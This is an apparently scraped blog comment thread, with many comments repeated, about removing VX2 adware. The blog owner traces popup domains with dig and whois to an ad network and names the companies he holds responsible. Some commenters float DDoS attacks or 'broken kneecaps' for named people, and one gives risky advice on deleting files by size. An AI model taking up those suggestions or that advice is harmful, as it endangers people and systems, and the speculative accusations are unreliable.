      Below You will find a few urls that are from the pop ups i get because of this virus…i have done everything I can think of to get rid of it but nothing works and now i cant use my CD drive because it is disabled and I cant get it working at all…This is so frustrating

      Tammie

      http://www.onlineshopp-ing.com/muon.html
      http://www.onlineshopp-ing.com/neutron.html
      http://www.uniqueoffer-s.com/muon.html
      http://www.realcoupon-s.com/muon.html
      http://www.realcoupon-s.com/neutron.html
      http://www.dealiotoday.com/muon.html

      • Re: VX2 infection

        Interesting. All of those Web sites are hosted by Level 3 Communications (www.level3.net). Each of them has a link to another ad server, http://ad.firstadsolution.com — hosted by Mzima networks (www.mzima.net). Mzima Networks has a network pairing agreement with Level 3.

        Level 3 Communications does not have a good reputation for shutting down spammers and network abusers; I have no idea what Mzima’s spam policies are.

        A Google search for “firstadsolution.com” shows that many, many people are complaining about adware and malware serving popups from ads.firstadsolution.com, so it seems likely that either they are directly involved in the creation of adware and malware, or at best they permit it.

        Firstadsolution.com is run by yieldmanager.com:

        tacit$ dig ad.firstadsolution.com

        ; <<>> DiG 9.2.2 <<>> ad.firstadsolution.com
        ;; global options: printcmd
        ;; Got answer:
        ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39001 ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;ad.firstadsolution.com. IN A ;; ANSWER SECTION: ad.firstadsolution.com. 775 IN CNAME ad.yieldmanager.com. ad.yieldmanager.com. 15 IN A 72.37.157.36 ;; AUTHORITY SECTION: ad.yieldmanager.com. 79 IN NS ns.yieldmanager.com. ;; Query time: 61 msec ;; SERVER: 192.168.1.1#53(192.168.1.1) ;; WHEN: Sun Apr 23 13:05:55 2006 ;; MSG SIZE rcvd: 103 Yieldmanager.com is just an advertiser login page. The login page links to rightmedia.com.

        So the infection you have is serving ads originating from rightmedia.com. Advertisers pay rightmedia.com to show their ads; rightmedia.com pays whoever wrote the malicious software you are infected with, or writes the malware themselves.

        tacit$ whois rightmedia.com

        Whois Server Version 2.0

        Domain names in the .com and .net domains can now be registered
        with many different competing registrars. Go to http://www.internic.net
        for detailed information.

        Domain Name: RIGHTMEDIA.COM
        Registrar: DOTSTER, INC.
        Whois Server: whois.dotster.com
        Referral URL: http://www.dotster.com
        Name Server: PDNS4.ULTRADNS.ORG
        Name Server: PDNS3.ULTRADNS.ORG
        Name Server: PDNS2.ULTRADNS.NET
        Name Server: PDNS1.ULTRADNS.NET
        Status: ACTIVE
        EPP Status: ok
        Updated Date: 13-Mar-2006
        Creation Date: 30-Mar-2003
        Expiration Date: 30-Mar-2007

        >>> Last update of whois database: Sun, 23 Apr 2006 13:09:42 EDT <<< Registrant: Right Media, LLC 276 5th Av. Ste. 401 New York, NY 10001 US Registrar: DOTSTER Domain Name: RIGHTMEDIA.COM Created on: 30-MAR-03 Expires on: 30-MAR-07 Last Updated on: 13-MAR-06 Administrative, Technical Contact: Administrator, DNS RIGHTMEDIA.COMyFeMC0@privacypost.com
        Right Media, LLC
        276 5th Av.
        Ste. 401
        New York, NY 10001
        US
        212-561-6474
        212-561-6471

        Domain servers in listed order:
        PDNS1.ULTRADNS.NET
        PDNS2.ULTRADNS.NET
        PDNS3.ULTRADNS.ORG
        PDNS4.ULTRADNS.ORG

        So that means the company that is paying the people who have infected your computer is:

        Right Media, LLC
        276 5th Av.
        Ste. 401
        New York, NY 10001
        US
        212-561-6474
        212-561-6471

        Wikipedia entry on RightMedia

        RightMedia’s email addresses are:

        By email (many options):
        General information – info@rightmedia.com
        Advertiser Sales – advertiser@rightmedia.com
        Publisher Sales – pubsol@rightmedia.com
        Account Managers – accountmgmt@rightmedia.com
        Support – support@rightmedia.com
        Jobs – jobs@rightmedia.com

        I have sent an email to Right Media asking them what their policies on popup advertising through malware like VX2 is.

  120. VX2 infection

    I just got a VX2 infection on an old win98 computer by another mechanism. The computer has all the updates, but I know that MSFT no longer supports win98 even though they claim to provide security updates. While simply sitting idle, with only eudora, an open ie window and seti at home running, something crashed in and caused an error page to come up (general exception fault). On re-boot, windows said that “it was updating my settings” a sure sign that something was just installed. Sure enough, Ad-Aware found VX2, and was able to remove it (or so it says). Another computer on the same home network running XP SP2 did not get infected. There must be variants of VX2 that use buffer overruns or some other generated error to install itself.

  121. Re: prosecution of aliens

    The US is just “part” of the world?

    Please…. Ok, all the countries who have been to the moon, raise your hands.

    (Counts ONE)

    Ok, the rest of you are THIRD WORLD COUNTRIES.

    ‘Nuff said.

  122. *ahem* “hypothetically” speaking…

    So far no one has been able to take legal action against them right?

    What if somebody organizes DDOS attacks on those companies responsible for developing, distribution, and generally helping along VX2 and coolwebsearch?

    If there’s no legal action to shut them down, hypothetically somebody might shut them down in other ways.

    Although, the option of making them go bankrupt by filing millions of lawsuits against them seem very interesting as well. The legal equivalent of a DOS attack :p

    • Re: *ahem* “hypothetically” speaking…

      Unfortunately, the people responsible for this particular piece of malware have made rather a lot of money on it–enough that the principal architect of this software drives around in a Lamborghini, and certainly more than enough money to pay for lawyers and others to investigate and prosecute illegal activity such as DDoS attacks. (I have myself received nastygrams from Canadian lawyers retained by some of the people named over this message.)

      Filing lawsuits against those responsible is a viable option for anyone living in Canada, or anyone with a great deal of cash; taking legal action against the residents of another country is an expensive proposition.

    • Re: *ahem* “hypothetically” speaking…

      That is true, tacit, but the U.S has lots of leverage over Canada I’m sure. If someone can somehow convince our government that it is in their best interest to shut these guys down (can we say billions of dollars lost every year due to viruses and malware?), the government can pressure the Canadian government to turn these guys over.

      I’m *sure* we have lots of ways to get other governments to do what we want. Nixon did it back in the 70s with the Smithsonian Agreement. We got France to go along with the rebuilding of post WWII Germany. We pressured Japan into voluntarily limit their export of cars into the U.S, and even though it took a LONG time (something like 90 years?) we managed to get Canada to join in a region trade bloc (NAFTA). I’m sure there are lots of carrots and sticks we have at our disposal should the government actually take an interest in this.

      Those guys have hurt U.S citizens (and U.S companies) so I’m sure there’s *some* grounds for extradition.

      • Re: *ahem* “hypothetically” speaking…

        No doubt, no doubt. But first, our government would have to take the issue of spam, viruses, and malware seriously–which so far, it doesn’t.

        We can but hope…

      • Re: *ahem* “hypothetically” speaking…

        thanks for the interesting reading..while i downloadstuff to try to get the vx2 off my kids pc..i gave him firefox..but still uses ie for the sites he goes to…this piece of crap virus mades me long for aim..ive been at this 5 hours now…of course his anti virus..adaware..spybotblaster..searchndestroy..wereall outof date…son you update your stuff..yea dad…well..next and soon its reformat..kid go downloadyour stuff,,,this viruscrap isso out of hand i made a geocites website with all the links to sypware..ect..so i can redo the pc from one spot..

        • Re: *ahem* “hypothetically” speaking…

          Well..I got ride of the nasty lil snot..If this helps anyone..What I did was use adaware to find the .exc and .dll files..wrote the names down..went to start in dos mode..typed..edit…which opens the dos editer..found the .exe file..open them..deleted and replaced randomly characters..trying to keep file the same size.
          than went to..find files…got all files less tham 83k..since the .dll was 82.5…and erased them if they were made in the date range..than ran adware..than did online scan with firefox browser
          http://fr.trendmicro-europe.com/consumer/housecall/housecall_launch.php
          It uses java…so it works with firefox..unlike most..been 3 days.and all clean…

  123. *ahem* “hypothetically” speaking…

    So far no one has been able to take legal action against them right?

    What if somebody organizes DDOS attacks on those companies responsible for developing, distribution, and generally helping along VX2 and coolwebsearch?

    If there’s no legal action to shut them down, hypothetically somebody might shut them down in other ways.

    Although, the option of making them go bankrupt by filing millions of lawsuits against them seem very interesting as well. The legal equivalent of a DOS attack :p

  124. Re: *ahem* “hypothetically” speaking…

    Unfortunately, the people responsible for this particular piece of malware have made rather a lot of money on it–enough that the principal architect of this software drives around in a Lamborghini, and certainly more than enough money to pay for lawyers and others to investigate and prosecute illegal activity such as DDoS attacks. (I have myself received nastygrams from Canadian lawyers retained by some of the people named over this message.)

    Filing lawsuits against those responsible is a viable option for anyone living in Canada, or anyone with a great deal of cash; taking legal action against the residents of another country is an expensive proposition.

  125. Re: *ahem* “hypothetically” speaking…

    That is true, tacit, but the U.S has lots of leverage over Canada I’m sure. If someone can somehow convince our government that it is in their best interest to shut these guys down (can we say billions of dollars lost every year due to viruses and malware?), the government can pressure the Canadian government to turn these guys over.

    I’m *sure* we have lots of ways to get other governments to do what we want. Nixon did it back in the 70s with the Smithsonian Agreement. We got France to go along with the rebuilding of post WWII Germany. We pressured Japan into voluntarily limit their export of cars into the U.S, and even though it took a LONG time (something like 90 years?) we managed to get Canada to join in a region trade bloc (NAFTA). I’m sure there are lots of carrots and sticks we have at our disposal should the government actually take an interest in this.

    Those guys have hurt U.S citizens (and U.S companies) so I’m sure there’s *some* grounds for extradition.

  126. Re: *ahem* “hypothetically” speaking…

    No doubt, no doubt. But first, our government would have to take the issue of spam, viruses, and malware seriously–which so far, it doesn’t.

    We can but hope…

  127. Re: *ahem* “hypothetically” speaking…

    thanks for the interesting reading..while i downloadstuff to try to get the vx2 off my kids pc..i gave him firefox..but still uses ie for the sites he goes to…this piece of crap virus mades me long for aim..ive been at this 5 hours now…of course his anti virus..adaware..spybotblaster..searchndestroy..wereall outof date…son you update your stuff..yea dad…well..next and soon its reformat..kid go downloadyour stuff,,,this viruscrap isso out of hand i made a geocites website with all the links to sypware..ect..so i can redo the pc from one spot..

  128. Re: *ahem* “hypothetically” speaking…

    Well..I got ride of the nasty lil snot..If this helps anyone..What I did was use adaware to find the .exc and .dll files..wrote the names down..went to start in dos mode..typed..edit…which opens the dos editer..found the .exe file..open them..deleted and replaced randomly characters..trying to keep file the same size.
    than went to..find files…got all files less tham 83k..since the .dll was 82.5…and erased them if they were made in the date range..than ran adware..than did online scan with firefox browser
    http://fr.trendmicro-europe.com/consumer/housecall/housecall_launch.php
    It uses java…so it works with firefox..unlike most..been 3 days.and all clean…

  129. Thanks for the info about these scumbags

    I’m 14 hours into trying to remove this little bastard. Glad I found your site just about to try your method.

    How can the world tolerate these criminals, how can we stop this type of activity.

    I’ll be back to let you know the result of my effor to murder this file, in my case its a dll file that been identified not an exe, I cannot kill processes in task manager and its not the usual reg key method of denieying access to the task manager, advare advise this might be a new varient and to send the file but if i try to mail
    the file its reported as being 0kb and won’t send!

    • Re: Thanks for the info about these scumbags

      Well no luck so far, I have been round the loop 3 times now and I’m still stuck with this shit, this is day two and right now I could kill these bastards that put this shit out.

      Ad Adware won’t show me an .exe file, although Norton shows a .dll when I go into DOS it doesn’t exist?

      Oh if your worried about these scumbags sueing you over that letter, send it to me, I’ll host and they can try suing me, I’ll be quite happy to take these scumbags out into the open any time.

      • Re: Thanks for the info about these scumbags

        I have heard that VX2 is now incorporating rootkit technology, which hides its files from DOS and Windows. That may be why that file does not seem to exist when you open a DOS prompt. To see it, you may need to boot from some other volume, like a boot floppy or boot CD.

  130. Thanks for the info about these scumbags

    I’m 14 hours into trying to remove this little bastard. Glad I found your site just about to try your method.

    How can the world tolerate these criminals, how can we stop this type of activity.

    I’ll be back to let you know the result of my effor to murder this file, in my case its a dll file that been identified not an exe, I cannot kill processes in task manager and its not the usual reg key method of denieying access to the task manager, advare advise this might be a new varient and to send the file but if i try to mail
    the file its reported as being 0kb and won’t send!

  131. Re: Thanks for the info about these scumbags

    Well no luck so far, I have been round the loop 3 times now and I’m still stuck with this shit, this is day two and right now I could kill these bastards that put this shit out.

    Ad Adware won’t show me an .exe file, although Norton shows a .dll when I go into DOS it doesn’t exist?

    Oh if your worried about these scumbags sueing you over that letter, send it to me, I’ll host and they can try suing me, I’ll be quite happy to take these scumbags out into the open any time.

  132. Re: VX2 infection

    Below You will find a few urls that are from the pop ups i get because of this virus…i have done everything I can think of to get rid of it but nothing works and now i cant use my CD drive because it is disabled and I cant get it working at all…This is so frustrating

    Tammie

    http://www.onlineshopp-ing.com/muon.html
    http://www.onlineshopp-ing.com/neutron.html
    http://www.uniqueoffer-s.com/muon.html
    http://www.realcoupon-s.com/muon.html
    http://www.realcoupon-s.com/neutron.html
    http://www.dealiotoday.com/muon.html

  133. Re: VX2 infection

    Interesting. All of those Web sites are hosted by Level 3 Communications (www.level3.net). Each of them has a link to another ad server, http://ad.firstadsolution.com — hosted by Mzima networks (www.mzima.net). Mzima Networks has a network pairing agreement with Level 3.

    Level 3 Communications does not have a good reputation for shutting down spammers and network abusers; I have no idea what Mzima’s spam policies are.

    A Google search for “firstadsolution.com” shows that many, many people are complaining about adware and malware serving popups from ads.firstadsolution.com, so it seems likely that either they are directly involved in the creation of adware and malware, or at best they permit it.

    Firstadsolution.com is run by yieldmanager.com:

    tacit$ dig ad.firstadsolution.com

    ; <<>> DiG 9.2.2 <<>> ad.firstadsolution.com
    ;; global options: printcmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39001 ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;ad.firstadsolution.com. IN A ;; ANSWER SECTION: ad.firstadsolution.com. 775 IN CNAME ad.yieldmanager.com. ad.yieldmanager.com. 15 IN A 72.37.157.36 ;; AUTHORITY SECTION: ad.yieldmanager.com. 79 IN NS ns.yieldmanager.com. ;; Query time: 61 msec ;; SERVER: 192.168.1.1#53(192.168.1.1) ;; WHEN: Sun Apr 23 13:05:55 2006 ;; MSG SIZE rcvd: 103 Yieldmanager.com is just an advertiser login page. The login page links to rightmedia.com.

    So the infection you have is serving ads originating from rightmedia.com. Advertisers pay rightmedia.com to show their ads; rightmedia.com pays whoever wrote the malicious software you are infected with, or writes the malware themselves.

    tacit$ whois rightmedia.com

    Whois Server Version 2.0

    Domain names in the .com and .net domains can now be registered
    with many different competing registrars. Go to http://www.internic.net
    for detailed information.

    Domain Name: RIGHTMEDIA.COM
    Registrar: DOTSTER, INC.
    Whois Server: whois.dotster.com
    Referral URL: http://www.dotster.com
    Name Server: PDNS4.ULTRADNS.ORG
    Name Server: PDNS3.ULTRADNS.ORG
    Name Server: PDNS2.ULTRADNS.NET
    Name Server: PDNS1.ULTRADNS.NET
    Status: ACTIVE
    EPP Status: ok
    Updated Date: 13-Mar-2006
    Creation Date: 30-Mar-2003
    Expiration Date: 30-Mar-2007

    >>> Last update of whois database: Sun, 23 Apr 2006 13:09:42 EDT <<< Registrant: Right Media, LLC 276 5th Av. Ste. 401 New York, NY 10001 US Registrar: DOTSTER Domain Name: RIGHTMEDIA.COM Created on: 30-MAR-03 Expires on: 30-MAR-07 Last Updated on: 13-MAR-06 Administrative, Technical Contact: Administrator, DNS RIGHTMEDIA.COMyFeMC0@privacypost.com
    Right Media, LLC
    276 5th Av.
    Ste. 401
    New York, NY 10001
    US
    212-561-6474
    212-561-6471

    Domain servers in listed order:
    PDNS1.ULTRADNS.NET
    PDNS2.ULTRADNS.NET
    PDNS3.ULTRADNS.ORG
    PDNS4.ULTRADNS.ORG

    So that means the company that is paying the people who have infected your computer is:

    Right Media, LLC
    276 5th Av.
    Ste. 401
    New York, NY 10001
    US
    212-561-6474
    212-561-6471

    Wikipedia entry on RightMedia

    RightMedia’s email addresses are:

    By email (many options):
    General information – info@rightmedia.com
    Advertiser Sales – advertiser@rightmedia.com
    Publisher Sales – pubsol@rightmedia.com
    Account Managers – accountmgmt@rightmedia.com
    Support – support@rightmedia.com
    Jobs – jobs@rightmedia.com

    I have sent an email to Right Media asking them what their policies on popup advertising through malware like VX2 is.

  134. Re: Thanks for the info about these scumbags

    I have heard that VX2 is now incorporating rootkit technology, which hides its files from DOS and Windows. That may be why that file does not seem to exist when you open a DOS prompt. To see it, you may need to boot from some other volume, like a boot floppy or boot CD.

  135. Popup Window De-Cloaking

    Hello,

    Just wanted to submit a useful trick to help in identifying the sources of popups:

    Popups are usually spawned using a “clean” window layout, ie: no menus, no resize or anything, just the window and the content.

    However, IE allows you to open a new window (containing the current location) by pressing CTRL-N. Other browsers may do this as well.. In IE, the new window will usually have the user’s default layout (typically including the menu, address bar, etc..)

    Therefore, hitting CTRL-N on a popup window (assuming the popup is IE-based) will open another window containing the same page, but this time you’ll be able to view/copy/cut the URL (and do something useful with it.)

    I use this all the time to blackhole popup-serving host addresses in my HOSTS file, and it works like the proverbial charm.. πŸ™‚

  136. Popup Window De-Cloaking

    Hello,

    Just wanted to submit a useful trick to help in identifying the sources of popups:

    Popups are usually spawned using a “clean” window layout, ie: no menus, no resize or anything, just the window and the content.

    However, IE allows you to open a new window (containing the current location) by pressing CTRL-N. Other browsers may do this as well.. In IE, the new window will usually have the user’s default layout (typically including the menu, address bar, etc..)

    Therefore, hitting CTRL-N on a popup window (assuming the popup is IE-based) will open another window containing the same page, but this time you’ll be able to view/copy/cut the URL (and do something useful with it.)

    I use this all the time to blackhole popup-serving host addresses in my HOSTS file, and it works like the proverbial charm.. πŸ™‚

  137. My VX2 Experience

    I have had this virus for about 2 weeks … and now it seems to be gone???

    I first noticed something was wrong when the pop ups came ( my pop up killer was ignorig them) . I did a quick Hijack This scan and saw that there was a starnge new dll – winlogin notify inmy system32 directory. I tried to remove it, however it wouldn’t go away. I also went directly to that directory and noticed there were 2 or 3 similar files all around 229 k in size created at the same time with different names. There was also something called guard.tmp I was able to delete the guard.tmp and one of the other instances. The others came up with a ” program used by another user/program” response. I have tried Adaware which first located one of the files , it couldn’t remove, but would try on reboot. tried that and one was gone with 2 new ones in it’s place. I understand that this is how it protects itself. I loaded the VX2 cleaner add on, which has never identified any of the files. Since then I have tried safe mode, doesn’t work. Tried deleting from dos mode – doesn’t work. Have tried a brute force uninstaller – didn’t work. Have even tried to decompile it for a glimpse of what other programs it works with in an effort to shut it down for a split second to delete it – no luck. Also doing a find for those files within regedit has proved a waste of time as well. What has worked is that I have setup a shortcut to system32 on my desktop. When I reboot or log back in, I quickly go to that directory and seem to be able to delete the newest instance, which has kept only 2 ( that I am aware of) instances of the virus in that directory. Finally what has seemed to work is this. For an online game (WOW) I needed to install the latest NVIDIA drivers. To do this you download the newest version, uninstall the old version, which neeeds to reboot to take affect. After reboot, you reinstall the new version with your security settings or program off. After the reboot, I looked at tyeh system32 directory to delete the new instance of the virus, and all instances were gone. They have been gone for 48 hours ????? I am truly hoping that this is not some veil trick, but no pop ups and no new instances. Hijack this scan, shows that those files are missing/gone. Let me know your thoughts. I will take a look in my history and see what URLs I have, I know that I initially restricted some of the pop up sites, I’ll do some digging and post when I can.

    Cheers.

  138. My VX2 Experience

    I have had this virus for about 2 weeks … and now it seems to be gone???

    I first noticed something was wrong when the pop ups came ( my pop up killer was ignorig them) . I did a quick Hijack This scan and saw that there was a starnge new dll – winlogin notify inmy system32 directory. I tried to remove it, however it wouldn’t go away. I also went directly to that directory and noticed there were 2 or 3 similar files all around 229 k in size created at the same time with different names. There was also something called guard.tmp I was able to delete the guard.tmp and one of the other instances. The others came up with a ” program used by another user/program” response. I have tried Adaware which first located one of the files , it couldn’t remove, but would try on reboot. tried that and one was gone with 2 new ones in it’s place. I understand that this is how it protects itself. I loaded the VX2 cleaner add on, which has never identified any of the files. Since then I have tried safe mode, doesn’t work. Tried deleting from dos mode – doesn’t work. Have tried a brute force uninstaller – didn’t work. Have even tried to decompile it for a glimpse of what other programs it works with in an effort to shut it down for a split second to delete it – no luck. Also doing a find for those files within regedit has proved a waste of time as well. What has worked is that I have setup a shortcut to system32 on my desktop. When I reboot or log back in, I quickly go to that directory and seem to be able to delete the newest instance, which has kept only 2 ( that I am aware of) instances of the virus in that directory. Finally what has seemed to work is this. For an online game (WOW) I needed to install the latest NVIDIA drivers. To do this you download the newest version, uninstall the old version, which neeeds to reboot to take affect. After reboot, you reinstall the new version with your security settings or program off. After the reboot, I looked at tyeh system32 directory to delete the new instance of the virus, and all instances were gone. They have been gone for 48 hours ????? I am truly hoping that this is not some veil trick, but no pop ups and no new instances. Hijack this scan, shows that those files are missing/gone. Let me know your thoughts. I will take a look in my history and see what URLs I have, I know that I initially restricted some of the pop up sites, I’ll do some digging and post when I can.

    Cheers.

  139. Oooh, thank you for the link. The “religious beliefs are privileged” piece nicely summarized some stuff I’ve been thinking about lately – although I preferred your entry πŸ™‚

  140. Oooh, thank you for the link. The “religious beliefs are privileged” piece nicely summarized some stuff I’ve been thinking about lately – although I preferred your entry πŸ™‚

  141. Wouldn’t a live Linux CD work, too?

    To make this process a little easier, couldn’t you go ahead and do the following in this order?

    1. Run Ad-Aware but have it NOT delete the files
    2. Insert a live Linux CD
    3. Unplug the computer when Ad-Aware is done
    4. Plug it back in, booting to the live CD

    Would that work?

  142. Get vigilante on their asses

    I’ve just spent hours of my valuable time getting rid of WinPC Antivirus malware – I assume this is similar or even an offshoot of VX2 you tracked down. It burns me up that millions of people besides myself are spending millions of wasted hours dealing with this crap, and nobody is doing anything about it. Somebody needs to get vigilante on their asses – a couple of broken kneecaps might help Cass Lativalle rethink whether it’s really worth the money they’re making on this scam.

    • Re: Get vigilante on their asses

      I definitely empathize.

      The antivirus malware isn’t his fault, though. It’s written and distributed by the Russian Zlob gang, who appear to be working with Russian organized crime. These are the same guys responsible for the attack on ISP iPower Web that I’ve talked about here, here, and here. They create malware and scareware that disguises itself in a number of ways–as porn movie player software, as video CODEC software, as bogus antivirus software, and the like, and they distribute it through a large, complex network of redirectors, Eastern European hosts, and compromised legitimate Web sites. They’re adept at finding new ways to distribute the malware, and have even made a (crude) Mac version of the malware.

    • Re: Get vigilante on their asses

      I definitely empathize.

      The antivirus malware isn’t his fault, though. It’s written and distributed by the Russian Zlob gang, who appear to be working with Russian organized crime. These are the same guys responsible for the attack on ISP iPower Web that I’ve talked about here, here, and here. They create malware and scareware that disguises itself in a number of ways–as porn movie player software, as video CODEC software, as bogus antivirus software, and the like, and they distribute it through a large, complex network of redirectors, Eastern European hosts, and compromised legitimate Web sites. They’re adept at finding new ways to distribute the malware, and have even made a (crude) Mac version of the malware.

  143. Get vigilante on their asses

    I’ve just spent hours of my valuable time getting rid of WinPC Antivirus malware – I assume this is similar or even an offshoot of VX2 you tracked down. It burns me up that millions of people besides myself are spending millions of wasted hours dealing with this crap, and nobody is doing anything about it. Somebody needs to get vigilante on their asses – a couple of broken kneecaps might help Cass Lativalle rethink whether it’s really worth the money they’re making on this scam.

  144. Get vigilante on their asses

    I’ve just spent hours of my valuable time getting rid of WinPC Antivirus malware – I assume this is similar or even an offshoot of VX2 you tracked down. It burns me up that millions of people besides myself are spending millions of wasted hours dealing with this crap, and nobody is doing anything about it. Somebody needs to get vigilante on their asses – a couple of broken kneecaps might help Cass Lativalle rethink whether it’s really worth the money they’re making on this scam.

  145. Get vigilante on their asses

    I’ve just spent hours of my valuable time getting rid of WinPC Antivirus malware – I assume this is similar or even an offshoot of VX2 you tracked down. It burns me up that millions of people besides myself are spending millions of wasted hours dealing with this crap, and nobody is doing anything about it. Somebody needs to get vigilante on their asses – a couple of broken kneecaps might help Cass Lativalle rethink whether it’s really worth the money they’re making on this scam.

  146. Re: Get vigilante on their asses

    I definitely empathize.

    The antivirus malware isn’t his fault, though. It’s written and distributed by the Russian Zlob gang, who appear to be working with Russian organized crime. These are the same guys responsible for the attack on ISP iPower Web that I’ve talked about here, here, and here. They create malware and scareware that disguises itself in a number of ways–as porn movie player software, as video CODEC software, as bogus antivirus software, and the like, and they distribute it through a large, complex network of redirectors, Eastern European hosts, and compromised legitimate Web sites. They’re adept at finding new ways to distribute the malware, and have even made a (crude) Mac version of the malware.

  147. Re: Get vigilante on their asses

    I definitely empathize.

    The antivirus malware isn’t his fault, though. It’s written and distributed by the Russian Zlob gang, who appear to be working with Russian organized crime. These are the same guys responsible for the attack on ISP iPower Web that I’ve talked about here, here, and here. They create malware and scareware that disguises itself in a number of ways–as porn movie player software, as video CODEC software, as bogus antivirus software, and the like, and they distribute it through a large, complex network of redirectors, Eastern European hosts, and compromised legitimate Web sites. They’re adept at finding new ways to distribute the malware, and have even made a (crude) Mac version of the malware.

  148. Rackspace

    I have had problems with Rackspace since 2008. They are webhosts for a very famous website owned by Charles Saatchi http://www.saatchi-gallery.co.uk

    The saatchi site has allowed its member to abuse me on a daily basis for five years, leading to two arrests in 2008, but it continued. I have been subjected to libel, defamation and death threats.

    A legal organization helped me in 2008 after a blog containing an extreme porn image supposed to be myself and my partner was published on that website hosted by Rackspace, they took it down after that organization threatened legal action, along with 20 or so others. But months later they allowed it to happen again and ignored my requests to stop their clients.

    This matter has no progressed to a trial of our main abuser of the Saatchi website, complaints to rackspace seem to have had a limited effect and closed down the saatchi chat room and forums two months ago, and they are still closed, but i have requested that rackspace close the site down entirely as i have proved saatchi are in breach of every single one of Rackspace AUP, but they have been ignoring my emails for weeks now, and i have threatened them with legal action now, especially as in looking through old files on cd’s from 2007/9 as further evidence the judge has requested, i was alarmed when i opened one of the live Saatchi webarchive files i had from their site from november 2007. I should say that since getting lots of suspicious activity on my computer in 2007 i have lost two new imacs. This third one i got recently and decided to install intego virus barrier before using it, and when a few weeks ago i opened that saatchi file from a cd, intego went crazy and a window popped up on the file telling me it is infected with a trojan horse. I sent a screenshot of it to rackspace and they have ignored me entirely, i am now leaving the matter in the hands of my solicitors.

  149. Rackspace

    I have had problems with Rackspace since 2008. They are webhosts for a very famous website owned by Charles Saatchi http://www.saatchi-gallery.co.uk

    The saatchi site has allowed its member to abuse me on a daily basis for five years, leading to two arrests in 2008, but it continued. I have been subjected to libel, defamation and death threats.

    A legal organization helped me in 2008 after a blog containing an extreme porn image supposed to be myself and my partner was published on that website hosted by Rackspace, they took it down after that organization threatened legal action, along with 20 or so others. But months later they allowed it to happen again and ignored my requests to stop their clients.

    This matter has no progressed to a trial of our main abuser of the Saatchi website, complaints to rackspace seem to have had a limited effect and closed down the saatchi chat room and forums two months ago, and they are still closed, but i have requested that rackspace close the site down entirely as i have proved saatchi are in breach of every single one of Rackspace AUP, but they have been ignoring my emails for weeks now, and i have threatened them with legal action now, especially as in looking through old files on cd’s from 2007/9 as further evidence the judge has requested, i was alarmed when i opened one of the live Saatchi webarchive files i had from their site from november 2007. I should say that since getting lots of suspicious activity on my computer in 2007 i have lost two new imacs. This third one i got recently and decided to install intego virus barrier before using it, and when a few weeks ago i opened that saatchi file from a cd, intego went crazy and a window popped up on the file telling me it is infected with a trojan horse. I sent a screenshot of it to rackspace and they have ignored me entirely, i am now leaving the matter in the hands of my solicitors.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.